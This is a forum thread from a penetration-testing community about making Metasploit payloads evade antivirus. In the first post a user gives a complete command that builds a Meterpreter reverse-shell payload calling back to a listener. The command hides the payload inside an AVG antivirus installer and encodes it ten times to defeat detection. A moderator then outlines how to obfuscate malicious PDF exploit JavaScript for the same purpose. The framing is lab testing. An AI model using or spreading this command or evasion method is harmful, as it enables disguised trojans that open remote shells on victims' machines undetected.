Results 1 to 4 of 4

Thread: msf encode av bypass works

Hybrid View

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default msf encode av bypass works

    Hi all,

    I just got a nice payload working bypassing most AV's according to virus total only 3 picked up.

    and it works on win 7 but it isnt really client side so i need to work out how to create a SET adobe util , like the one below manually: ie: pdf to exe type

    #msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.75 LPORT=9090 R | msfencode -x avg_free_stb_all_9_114_cnet.exe -t exe -e x86/shikata_ga_nai -c 10 -o avg.exe

    Is there a way to encode a pdf adobe util etc with same coding 10x x86/shikata_ga_na like the SET payloads or a way to specify this type using set with 10x encoding?

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: msf encode av bypass works

    There is a way to encode pdf files to bypass AV, yes, but you cant do it with msfencode because that is used to encode shellcode (payloads essentially), not entire exploits. Encoding of particular file types requires file type specific methods.

    I actually encoded a pdf file to bypass antivirus last week and was planning to write a blog entry about how, so I will post a link to that here when its done.

    If you're impatient, here is the basic process, which can be used for pdf exploits that use Javascript code to trigger the exploit (and that applies to the majority of current pdf sploits):
    1. Obtain the base JavaScript used to perform the exploit. This can be extracted from existing exploits if you know how.
    2. Obfuscate the JavaScript code for the exploit. Use your imagination here, and do a good job at it because this is the step that will provide the maximum benefit in terms of AV avoidance. You need workable Javascript knowledge for this.
    3. Use make-pdf tools from Didier Stevens to create a PDF that auto runs the script
    4. Compress the PDF using pdftk
    Last edited by lupin; 05-24-2010 at 11:52 PM.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: msf encode av bypass works

    Thanks lupin for the reply look forward to your blog post, its been very hard to try pentests in lab as my boxes all have eset smart security and it does its job well but just managed to bypass it with the msfencode i posted, on win 7 machine through nat .

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: msf encode av bypass works

    As mentioned earlier, I finally got around to writing a blog post about bypassing AV detection for malicious PDF files. Its here:

    The Grey Corner: Bypassing AntiVirus Detection for Malicious PDFs
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Similar Threads

  1. How to encode a PDF payload in metasploit?
    By AlinuX in forum OLD Pentesting
    Replies: 4
    Last Post: 04-01-2010, 08:01 PM
  2. Using a CD to bypass no boot from USB BIOS
    By disturbed in forum OLD Newbie Area
    Replies: 11
    Last Post: 02-05-2010, 11:24 AM
  3. how to make Persistent.rb encode its payload?
    By AlinuX in forum OLD Newbie Area
    Replies: 2
    Last Post: 01-27-2010, 02:39 AM
  4. Bypass safe mode
    By xpleet in forum OLD Pentesting
    Replies: 8
    Last Post: 05-01-2009, 08:35 PM
  5. ettercap -eth0 works, atheros works, ALFA Rtl8187 Problems
    By thegreo in forum OLD BT3beta General
    Replies: 4
    Last Post: 01-31-2008, 05:13 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •